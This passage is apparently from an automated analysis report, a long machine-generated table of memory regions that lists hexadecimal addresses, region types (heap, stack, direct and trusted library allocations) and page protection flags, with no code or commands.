page read and write
|
||
15D0000
|
heap
|
page read and write
|
||
106A000
|
unkown
|
page write copy
|
||
2CB5000
|
heap
|
page read and write
|
||
34D8000
|
heap
|
page read and write
|
||
4070000
|
direct allocation
|
page execute and read and write
|
||
5BB000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
3360000
|
heap
|
page read and write
|
||
7710000
|
trusted library allocation
|
page read and write
|
||
FF397F9000
|
stack
|
page read and write
|
||
FA2000
|
unkown
|
page readonly
|
||
FF381F7000
|
stack
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
12DB000
|
heap
|
page read and write
|
||
34C3000
|
heap
|
page read and write
|
||
355D000
|
heap
|
page read and write
|
||
778A000
|
heap
|
page read and write
|
||
85E7000
|
direct allocation
|
page read and write
|
||
2BAB000
|
trusted library allocation
|
page read and write
|
||
44B2000
|
direct allocation
|
page read and write
|
||
4FF0000
|
trusted library allocation
|
page read and write
|
||
578E000
|
heap
|
page read and write
|
||
7734000
|
heap
|
page read and write
|
||
1B15000
|
heap
|
page read and write
|
||
34AC000
|
direct allocation
|
page read and write
|
||
2ABD000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
6C9D000
|
direct allocation
|
page read and write
|
||
37D0000
|
direct allocation
|
page execute and read and write
|
||
5180000
|
heap
|
page read and write
|
||
4ECF000
|
stack
|
page read and write
|
||
32C6000
|
heap
|
page read and write
|
||
12C4000
|
heap
|
page read and write
|
||
4150000
|
direct allocation
|
page execute and read and write
|
||
795000
|
heap
|
page read and write
|
||
3691000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
8FCE000
|
stack
|
page read and write
|
||
2BE1747D000
|
trusted library allocation
|
page read and write
|
||
2BE12E60000
|
trusted library section
|
page readonly
|
||
7721000
|
heap
|
page read and write
|
||
3289000
|
heap
|
page read and write
|
||
2CB1000
|
heap
|
page read and write
|
||
2FE8000
|
heap
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
3C60000
|
direct allocation
|
page execute and read and write
|
||
8CB6000
|
direct allocation
|
page read and write
|
||
2BE12089000
|
heap
|
page read and write
|
||
43A0000
|
direct allocation
|
page execute and read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
1067000
|
unkown
|
page write copy
|
||
2CB8000
|
heap
|
page read and write
|
||
2BE12902000
|
heap
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
2AB2000
|
heap
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
30F1000
|
heap
|
page read and write
|
||
44E6000
|
direct allocation
|
page read and write
|
||
3652000
|
heap
|
page read and write
|
||
283E000
|
stack
|
page read and write
|
||
4FF6000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
145C000
|
heap
|
page read and write
|
||
2BE17430000
|
trusted library allocation
|
page read and write
|
||
35E0000
|
direct allocation
|
page execute and read and write
|
||
8EA0000
|
trusted library allocation
|
page read and write
|
||
2CAB000
|
heap
|
page read and write
|
||
8666000
|
direct allocation
|
page read and write
|
||
1AE3000
|
heap
|
page read and write
|
||
960000
|
heap
|
page read and write
|
||
1B2B000
|
heap
|
page read and write
|
||
5890000
|
heap
|
page execute and read and write
|
||
38E0000
|
direct allocation
|
page execute and read and write
|
||
1717000
|
heap
|
page read and write
|
||
3490000
|
heap
|
page read and write
|
||
35A0000
|
direct allocation
|
page execute and read and write
|
||
5620000
|
heap
|
page read and write
|
||
4ED000
|
stack
|
page read and write
|
||
4890000
|
heap
|
page read and write
|
||
900E000
|
stack
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
18B1000
|
heap
|
page read and write
|
||
310A000
|
heap
|
page read and write
|
||
2CAA000
|
heap
|
page read and write
|
||
2C3C000
|
stack
|
page read and write
|
||
1B21000
|
heap
|
page read and write
|
||
3489000
|
heap
|
page read and write
|
||
7717000
|
heap
|
page read and write
|
||
2C83000
|
heap
|
page read and write
|
||
2F18000
|
heap
|
page read and write
|
||
3030000
|
heap
|
page read and write
|
||
FF38AFB000
|
stack
|
page read and write
|
||
7DBC000
|
heap
|
page read and write
|
||
1710000
|
heap
|
page read and write
|
||
3930000
|
direct allocation
|
page execute and read and write
|
||
34A0000
|
heap
|
page read and write
|
||
32B5000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
383E000
|
stack
|
page read and write
|
||
155A000
|
heap
|
page read and write
|
||
7721000
|
heap
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
5AE000
|
stack
|
page read and write
|
||
50F000
|
stack
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
2FF1000
|
heap
|
page read and write
|
||
272C000
|
direct allocation
|
page read and write
|
||
7AC000
|
heap
|
page read and write
|
||
BCD000
|
stack
|
page read and write
|
||
1B04000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
1B1A000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
A47E000
|
stack
|
page read and write
|
||
106A000
|
unkown
|
page write copy
|
||
336E000
|
stack
|
page read and write
|
||
695E000
|
stack
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
D76000
|
heap
|
page read and write
|
||
3D70000
|
direct allocation
|
page execute and read and write
|
||
1B15000
|
heap
|
page read and write
|
||
33C0000
|
direct allocation
|
page read and write
|
||
FA2000
|
unkown
|
page readonly
|
||
1295C1C3000
|
heap
|
page read and write
|
||
500000
|
unkown
|
page execute read
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
3C25000
|
heap
|
page read and write
|
||
7DC000
|
heap
|
page read and write
|
||
86D0000
|
direct allocation
|
page read and write
|
||
FA2000
|
unkown
|
page readonly
|
||
A10000
|
heap
|
page read and write
|
||
271D000
|
direct allocation
|
page read and write
|
||
1AEB000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2CB1000
|
heap
|
page read and write
|
||
12BE98F0000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
7721000
|
heap
|
page read and write
|
||
A18000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
7FDBE000
|
direct allocation
|
page read and write
|
||
22DC000
|
direct allocation
|
page read and write
|
||
8FB000
|
heap
|
page read and write
|
||
7721000
|
heap
|
page read and write
|
||
940000
|
unkown
|
page readonly
|
||
3F70000
|
direct allocation
|
page execute and read and write
|
||
15FD000
|
stack
|
page read and write
|
||
FF38FFE000
|
unkown
|
page readonly
|
||
33A4000
|
heap
|
page read and write
|
||
23A0000
|
heap
|
page read and write
|
||
34E9000
|
direct allocation
|
page read and write
|
||
4CAD000
|
direct allocation
|
page read and write
|
||
5673000
|
heap
|
page read and write
|
||
FF396FE000
|
unkown
|
page readonly
|
||
766000
|
heap
|
page read and write
|
||
32F6000
|
heap
|
page read and write
|
||
2BE17500000
|
trusted library allocation
|
page read and write
|
||
5008000
|
trusted library allocation
|
page read and write
|
||
3200000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
337F000
|
stack
|
page read and write
|
||
31C0000
|
direct allocation
|
page read and write
|
||
3310000
|
heap
|
page read and write
|
||
348A000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2F10000
|
heap
|
page read and write
|
||
8F7000
|
heap
|
page read and write
|
||
6C57000
|
direct allocation
|
page read and write
|
||
275E000
|
direct allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
3BB0000
|
direct allocation
|
page execute and read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
17E8000
|
heap
|
page read and write
|
||
1295C1A0000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
8B8E000
|
direct allocation
|
page read and write
|
||
12D5000
|
heap
|
page read and write
|
||
50D000
|
unkown
|
page read and write
|
||
2EED000
|
heap
|
page read and write
|
||
3294000
|
heap
|
page read and write
|
||
2BE12066000
|
heap
|
page read and write
|
||
3C80000
|
direct allocation
|
page execute and read and write
|
||
40A0000
|
direct allocation
|
page execute and read and write
|
||
42F0000
|
direct allocation
|
page execute and read and write
|
||
3643000
|
heap
|
page read and write
|
||
1B1A000
|
heap
|
page read and write
|
||
34AF000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2BE17690000
|
heap
|
page read and write
|
||
348A000
|
heap
|
page read and write
|
||
1C58000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
246D000
|
direct allocation
|
page read and write
|
||
7786000
|
heap
|
page read and write
|
||
3F80000
|
direct allocation
|
page execute and read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
3211000
|
heap
|
page read and write
|
||
1295C1EF000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
3580000
|
heap
|
page read and write
|
||
743000
|
heap
|
page read and write
|
||
1061000
|
unkown
|
page read and write
|
||
3890000
|
direct allocation
|
page execute and read and write
|
||
3338000
|
direct allocation
|
page read and write
|
||
3680000
|
heap
|
page read and write
|
||
8150000
|
trusted library allocation
|
page read and write
|
||
2310000
|
direct allocation
|
page execute and read and write
|
||
3420000
|
direct allocation
|
page execute and read and write
|
||
50EF000
|
stack
|
page read and write
|
||
2ABB000
|
stack
|
page read and write
|
||
3940000
|
direct allocation
|
page execute and read and write
|
||
7716000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
7735000
|
heap
|
page read and write
|
||
229F000
|
direct allocation
|
page read and write
|
||
7734000
|
heap
|
page read and write
|
||
910000
|
heap
|
page read and write
|
||
2D1E000
|
stack
|
page read and write
|
||
FF392FE000
|
unkown
|
page readonly
|
||
2AAE000
|
heap
|
page read and write
|
||
1798000
|
heap
|
page read and write
|
||
500C000
|
trusted library allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
F14000
|
trusted library allocation
|
page read and write
|
||
7FD32000
|
direct allocation
|
page read and write
|
||
2716000
|
direct allocation
|
page read and write
|
||
2EEA000
|
heap
|
page read and write
|
||
2F80000
|
trusted library allocation
|
page read and write
|
||
2BE12E90000
|
trusted library section
|
page readonly
|
||
3DD0000
|
direct allocation
|
page execute and read and write
|
||
34EC000
|
direct allocation
|
page read and write
|
||
1295C140000
|
heap
|
page read and write
|
||
11CE000
|
stack
|
page read and write
|
||
1B7F000
|
stack
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
13E0000
|
heap
|
page read and write
|
||
1295C1DB000
|
heap
|
page read and write
|
||
97000
|
stack
|
page read and write
|
||
77F1000
|
heap
|
page read and write
|
||
8ACC000
|
direct allocation
|
page read and write
|
||
57B3000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
3B00000
|
direct allocation
|
page execute and read and write
|
||
3AA0000
|
direct allocation
|
page execute and read and write
|
||
3567000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
3780000
|
direct allocation
|
page execute and read and write
|
||
648000
|
heap
|
page read and write
|
||
243B000
|
direct allocation
|
page read and write
|
||
1ABEB8F000
|
stack
|
page read and write
|
||
3D29000
|
trusted library allocation
|
page read and write
|
||
32F0000
|
heap
|
page read and write
|
||
1132000
|
trusted library allocation
|
page read and write
|
||
1A3F000
|
stack
|
page read and write
|
||
93CC000
|
stack
|
page read and write
|
||
6EF000
|
stack
|
page read and write
|
||
3414000
|
direct allocation
|
page execute and read and write
|
||
3565000
|
heap
|
page read and write
|
||
2E1A000
|
trusted library allocation
|
page read and write
|
||
3C16000
|
heap
|
page read and write
|
||
4FBF000
|
stack
|
page read and write
|
||
7FD10000
|
direct allocation
|
page read and write
|
||
2BE17640000
|
heap
|
page read and write
|
||
7710000
|
trusted library allocation
|
page read and write
|
||
7721000
|
heap
|
page read and write
|
||
9A60000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1066000
|
unkown
|
page read and write
|
||
23D1000
|
direct allocation
|
page read and write
|
||
3428000
|
direct allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
3C27000
|
heap
|
page read and write
|
||
8850000
|
trusted library allocation
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2ABE000
|
heap
|
page read and write
|
||
3570000
|
direct allocation
|
page execute and read and write
|
||
3DF0000
|
direct allocation
|
page execute and read and write
|
||
12D1000
|
heap
|
page read and write
|
||
3790000
|
direct allocation
|
page execute and read and write
|
||
31AA000
|
heap
|
page read and write
|
||
2BE1205B000
|
heap
|
page read and write
|
||
3E80000
|
direct allocation
|
page execute and read and write
|
||
A57D000
|
stack
|
page read and write
|
||
3FC0000
|
direct allocation
|
page execute and read and write
|
||
7789000
|
heap
|
page read and write
|
||
1B15000
|
heap
|
page read and write
|
||
6500000
|
direct allocation
|
page read and write
|
||
2C7F000
|
heap
|
page read and write
|
||
12CB000
|
heap
|
page read and write
|
||
32C2000
|
direct allocation
|
page read and write
|
||
8480000
|
trusted library allocation
|
page read and write
|
||
66F0000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
4460000
|
direct allocation
|
page execute and read and write
|
||
E66000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
3688000
|
heap
|
page read and write
|
||
321B000
|
heap
|
page read and write
|
||
2BE12000000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
1B11000
|
heap
|
page read and write
|
||
DBE000
|
stack
|
page read and write
|
||
3C10000
|
heap
|
page read and write
|
||
2DDC000
|
stack
|
page read and write
|
||
2DAE000
|
trusted library allocation
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
F9E000
|
unkown
|
page read and write
|
||
1B1B000
|
heap
|
page read and write
|
||
3F40000
|
direct allocation
|
page execute and read and write
|
||
1C6B000
|
heap
|
page read and write
|
||
8150000
|
trusted library allocation
|
page read and write
|
||
32D0000
|
heap
|
page read and write
|
||
33B8000
|
heap
|
page read and write
|
||
5313000
|
heap
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
506000
|
unkown
|
page read and write
|
||
65BD000
|
direct allocation
|
page read and write
|
||
4470000
|
direct allocation
|
page execute and read and write
|
||
BBF000
|
stack
|
page read and write
|
||
1AFE000
|
heap
|
page read and write
|
||
1F3AE590000
|
heap
|
page read and write
|
||
4FD0000
|
unclassified section
|
page read and write
|
||
8A9D000
|
direct allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2CB5000
|
heap
|
page read and write
|
||
2F1C000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2F06000
|
heap
|
page read and write
|
||
1295C1DC000
|
heap
|
page read and write
|
||
7F7000
|
heap
|
page read and write
|
||
3C25000
|
heap
|
page read and write
|
||
3720000
|
direct allocation
|
page execute and read and write
|
||
2DE0000
|
trusted library allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
8613000
|
direct allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
3670000
|
direct allocation
|
page execute and read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
503F000
|
stack
|
page read and write
|
||
23EB000
|
direct allocation
|
page read and write
|
||
52E0000
|
trusted library section
|
page readonly
|
||
33A4000
|
heap
|
page read and write
|
||
3468000
|
heap
|
page read and write
|
||
8643000
|
direct allocation
|
page read and write
|
||
61E9E000
|
unkown
|
page write copy
|
||
4100000
|
direct allocation
|
page execute and read and write
|
||
2CC0000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
3A10000
|
direct allocation
|
page execute and read and write
|
||
2F6D000
|
stack
|
page read and write
|
||
7FDE0000
|
direct allocation
|
page read and write
|
||
7B7000
|
heap
|
page read and write
|
||
5A9F000
|
stack
|
page read and write
|
||
1AD0000
|
heap
|
page read and write
|
||
7D84000
|
heap
|
page read and write
|
||
500A000
|
trusted library allocation
|
page read and write
|
||
2C7C000
|
heap
|
page read and write
|
||
2FF1000
|
heap
|
page read and write
|
||
51C0000
|
heap
|
page read and write
|
||
3220000
|
heap
|
page read and write
|
||
D40000
|
heap
|
page read and write
|
||
752000
|
heap
|
page read and write
|
||
36B0000
|
direct allocation
|
page read and write
|
||
16F0000
|
direct allocation
|
page read and write
|
||
1295C1BE000
|
heap
|
page read and write
|
||
1B1B000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
FF3937E000
|
stack
|
page read and write
|
||
1ACE000
|
stack
|
page read and write
|
||
2E18000
|
trusted library allocation
|
page read and write
|
||
43C0000
|
direct allocation
|
page execute and read and write
|
||
77F1000
|
heap
|
page read and write
|
||
2708000
|
direct allocation
|
page read and write
|
||
33C8000
|
direct allocation
|
page read and write
|
||
30F0000
|
heap
|
page read and write
|
||
C9F000
|
stack
|
page read and write
|
||
12D1000
|
heap
|
page read and write
|
||
3740000
|
direct allocation
|
page execute and read and write
|
||
2440000
|
direct allocation
|
page read and write
|
||
42C0000
|
direct allocation
|
page execute and read and write
|
||
988C000
|
stack
|
page read and write
|
||
3C16000
|
heap
|
page read and write
|
||
15D000
|
stack
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
12BE99F0000
|
heap
|
page read and write
|
||
D10000
|
unkown
|
page readonly
|
||
349A000
|
heap
|
page read and write
|
||
7B80000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
12CA000
|
heap
|
page read and write
|
||
9FD000
|
stack
|
page read and write
|
||
7721000
|
heap
|
page read and write
|
||
2F1D000
|
stack
|
page read and write
|
||
3C70000
|
direct allocation
|
page execute and read and write
|
||
12DB000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
393F000
|
stack
|
page read and write
|
||
2CBB000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
8490000
|
trusted library allocation
|
page read and write
|
||
34A2000
|
heap
|
page read and write
|
||
3760000
|
heap
|
page read and write
|
||
32F3000
|
direct allocation
|
page read and write
|
||
1295C206000
|
heap
|
page read and write
|
||
8590000
|
direct allocation
|
page read and write
|
||
7CA000
|
heap
|
page read and write
|
||
3860000
|
direct allocation
|
page execute and read and write
|
||
7784000
|
heap
|
page read and write
|
||
779000
|
heap
|
page read and write
|
||
4190000
|
direct allocation
|
page execute and read and write
|
||
40E0000
|
direct allocation
|
page execute and read and write
|
||
7789000
|
heap
|
page read and write
|
||
4F30000
|
heap
|
page read and write
|
||
36D4000
|
direct allocation
|
page read and write
|
||
34AC000
|
direct allocation
|
page read and write
|
||
8ABE000
|
direct allocation
|
page read and write
|
||
1B0A000
|
heap
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
112E000
|
stack
|
page read and write
|
||
880C000
|
direct allocation
|
page read and write
|
||
866C000
|
direct allocation
|
page read and write
|
||
1295C21F000
|
heap
|
page read and write
|
||
6C28000
|
direct allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
41F0000
|
direct allocation
|
page execute and read and write
|
||
129F000
|
heap
|
page read and write
|
||
F65000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
8E4D000
|
stack
|
page read and write
|
||
1295C1B4000
|
heap
|
page read and write
|
||
4030000
|
direct allocation
|
page execute and read and write
|
||
9E3831C000
|
stack
|
page read and write
|
||
2BE12E70000
|
trusted library section
|
page readonly
|
||
7ABC000
|
heap
|
page read and write
|
||
31FF000
|
heap
|
page read and write
|
||
187E000
|
heap
|
page read and write
|
||
502000
|
unkown
|
page read and write
|
||
D0F000
|
stack
|
page read and write
|
||
1B15000
|
heap
|
page read and write
|
||
6C06000
|
direct allocation
|
page read and write
|
||
35E0000
|
trusted library allocation
|
page read and write
|
||
2FE5000
|
heap
|
page read and write
|
||
2D1B000
|
stack
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
8695000
|
direct allocation
|
page read and write
|
||
1B28000
|
heap
|
page read and write
|
||
300F000
|
stack
|
page read and write
|
||
1295C1A8000
|
heap
|
page read and write
|
||
7FE20000
|
direct allocation
|
page read and write
|
||
1ADF000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
3620000
|
direct allocation
|
page execute and read and write
|
||
7726000
|
heap
|
page read and write
|
||
84F0000
|
trusted library allocation
|
page read and write
|
||
7FD1C000
|
direct allocation
|
page read and write
|
||
2BE17460000
|
trusted library allocation
|
page read and write
|
||
3491000
|
heap
|
page read and write
|
||
24E0000
|
heap
|
page read and write
|
||
2BE17450000
|
trusted library allocation
|
page read and write
|
||
3C50000
|
direct allocation
|
page execute and read and write
|
||
D11000
|
unkown
|
page execute read
|
||
4FF0000
|
trusted library allocation
|
page read and write
|
||
273A000
|
direct allocation
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
1FF662F0000
|
heap
|
page read and write
|
||
3C1E000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
457B000
|
direct allocation
|
page read and write
|
||
2E23000
|
trusted library allocation
|
page read and write
|
||
319E000
|
heap
|
page read and write
|
||
34A5000
|
heap
|
page read and write
|
||
D10000
|
unkown
|
page readonly
|
||
778B000
|
heap
|
page read and write
|
||
D10000
|
unkown
|
page readonly
|
||
11B0000
|
heap
|
page read and write
|
||
1C5C000
|
heap
|
page read and write
|
||
3368000
|
heap
|
page read and write
|
||
3D00000
|
direct allocation
|
page execute and read and write
|
||
1B11000
|
heap
|
page read and write
|
||
1B0A000
|
heap
|
page read and write
|
||
681E000
|
stack
|
page read and write
|
||
2FA0000
|
heap
|
page read and write
|
||
778B000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
3AF0000
|
direct allocation
|
page execute and read and write
|
||
D11000
|
unkown
|
page execute read
|
||
2FE4000
|
heap
|
page read and write
|
||
2750000
|
direct allocation
|
page read and write
|
||
643F000
|
stack
|
page read and write
|
||
C08000
|
heap
|
page read and write
|
||
1558000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
68B0000
|
trusted library allocation
|
page read and write
|
||
F9E000
|
unkown
|
page read and write
|
||
3646000
|
heap
|
page read and write
|
||
12D1000
|
heap
|
page read and write
|
||
21C8000
|
direct allocation
|
page read and write
|
||
7A9000
|
heap
|
page read and write
|
||
2ACB000
|
heap
|
page read and write
|
||
79B000
|
heap
|
page read and write
|
||
87DC000
|
direct allocation
|
page read and write
|
||
417000
|
unkown
|
page read and write
|
||
450A000
|
direct allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2EC0000
|
remote allocation
|
page read and write
|
||
8A5D000
|
stack
|
page read and write
|
||
223D000
|
direct allocation
|
page read and write
|
||
7FD81000
|
direct allocation
|
page read and write
|
||
3C10000
|
direct allocation
|
page execute and read and write
|
||
3657000
|
heap
|
page read and write
|
||
8672000
|
direct allocation
|
page read and write
|
||
30D0000
|
heap
|
page read and write
|
||
2BE17620000
|
heap
|
page read and write
|
||
2CAA000
|
heap
|
page read and write
|
||
341E000
|
stack
|
page read and write
|
||
735000
|
heap
|
page read and write
|
||
1484000
|
unkown
|
page execute and read and write
|
||
77F1000
|
heap
|
page read and write
|
||
2ED9000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
3360000
|
heap
|
page read and write
|
||
797000
|
heap
|
page read and write
|
||
F23000
|
trusted library allocation
|
page read and write
|
||
2BE174C1000
|
trusted library allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
1895000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
1295C1C0000
|
heap
|
page read and write
|
||
51D0000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
2FA8000
|
heap
|
page read and write
|
||
2B8C000
|
stack
|
page read and write
|
||
FF38BFE000
|
unkown
|
page readonly
|
||
5E6000
|
unkown
|
page readonly
|
||
34AB000
|
heap
|
page read and write
|
||
7FD90000
|
direct allocation
|
page read and write
|
||
71F000
|
stack
|
page read and write
|
||
3450000
|
heap
|
page read and write
|
||
364F000
|
stack
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
7EB000
|
heap
|
page read and write
|
||
2CB5000
|
heap
|
page read and write
|
||
2A98000
|
heap
|
page read and write
|
||
2F19000
|
heap
|
page read and write
|
||
869000
|
unkown
|
page execute and write copy
|
||
2ACB000
|
heap
|
page read and write
|
||
23B7000
|
direct allocation
|
page read and write
|
||
113A000
|
trusted library allocation
|
page execute and read and write
|
||
3B20000
|
direct allocation
|
page execute and read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1295C1B6000
|
heap
|
page read and write
|
||
106B000
|
unkown
|
page readonly
|
||
34A4000
|
heap
|
page read and write
|
||
3400000
|
heap
|
page read and write
|
||
552F000
|
stack
|
page read and write
|
||
7725000
|
heap
|
page read and write
|
||
4FF6000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
3211000
|
heap
|
page read and write
|
||
106A000
|
unkown
|
page write copy
|
||
1295C160000
|
remote allocation
|
page read and write
|
||
9E8000
|
stack
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
84E0000
|
trusted library allocation
|
page read and write
|
||
2BE17580000
|
trusted library allocation
|
page read and write
|
||
8AC7000
|
direct allocation
|
page read and write
|
||
3290000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
3DC0000
|
direct allocation
|
page execute and read and write
|
||
8808000
|
direct allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
31C0000
|
direct allocation
|
page read and write
|
||
1066000
|
unkown
|
page write copy
|
||
2FD4000
|
heap
|
page read and write
|
||
1295C1BD000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
9DE000
|
stack
|
page read and write
|
||
778B000
|
heap
|
page read and write
|
||
7B1000
|
heap
|
page read and write
|
||
1295C1DC000
|
heap
|
page read and write
|
||
FF3947E000
|
stack
|
page read and write
|
||
697000
|
heap
|
page read and write
|
||
33ED000
|
stack
|
page read and write
|
||
7717000
|
heap
|
page read and write
|
||
94CD000
|
stack
|
page read and write
|
||
84D0000
|
trusted library allocation
|
page read and write
|
||
34A6000
|
heap
|
page read and write
|
||
8480000
|
trusted library allocation
|
page read and write
|
||
3470000
|
heap
|
page read and write
|
||
1FF663F0000
|
heap
|
page read and write
|
||
633E000
|
stack
|
page read and write
|
||
7C7000
|
heap
|
page read and write
|
||
348D000
|
heap
|
page read and write
|
||
3550000
|
heap
|
page read and write
|
||
881000
|
unkown
|
page execute and read and write
|
||
2BE12129000
|
heap
|
page read and write
|
||
3556000
|
heap
|
page read and write
|
||
23BF000
|
direct allocation
|
page read and write
|
||
2BE120B0000
|
heap
|
page read and write
|
||
3E20000
|
direct allocation
|
page execute and read and write
|
||
D50000
|
heap
|
page read and write
|
||
325C000
|
stack
|
page read and write
|
||
31D0000
|
direct allocation
|
page execute and read and write
|
||
76D000
|
heap
|
page read and write
|
||
106A000
|
unkown
|
page write copy
|
||
1B1A000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
3080000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
7D1000
|
heap
|
page read and write
|
||
22F1000
|
direct allocation
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
7A9000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
3820000
|
direct allocation
|
page execute and read and write
|
||
2BE174EA000
|
trusted library allocation
|
page read and write
|
||
C60000
|
heap
|
page read and write
|
||
4CA0000
|
direct allocation
|
page read and write
|
||
7734000
|
heap
|
page read and write
|
||
7FD0E000
|
direct allocation
|
page read and write
|
||
2BE1209D000
|
heap
|
page read and write
|
||
2401000
|
direct allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
7725000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
30CF000
|
stack
|
page read and write
|
||
4350000
|
direct allocation
|
page execute and read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
1140000
|
trusted library allocation
|
page read and write
|
||
3340000
|
direct allocation
|
page execute and read and write
|
||
8B73000
|
direct allocation
|
page read and write
|
||
3990000
|
direct allocation
|
page execute and read and write
|
||
7FE10000
|
direct allocation
|
page read and write
|
||
2BE12815000
|
heap
|
page read and write
|
||
7725000
|
heap
|
page read and write
|
||
3471000
|
direct allocation
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
FA2000
|
unkown
|
page readonly
|
||
2FC7000
|
heap
|
page read and write
|
||
5008000
|
trusted library allocation
|
page read and write
|
||
106A000
|
unkown
|
page write copy
|
||
7FD6D000
|
direct allocation
|
page read and write
|
||
2483000
|
direct allocation
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
2BE133A0000
|
trusted library allocation
|
page read and write
|
||
85BD000
|
direct allocation
|
page read and write
|
||
2CBB000
|
heap
|
page read and write
|
||
1C69000
|
heap
|
page read and write
|
||
32B5000
|
heap
|
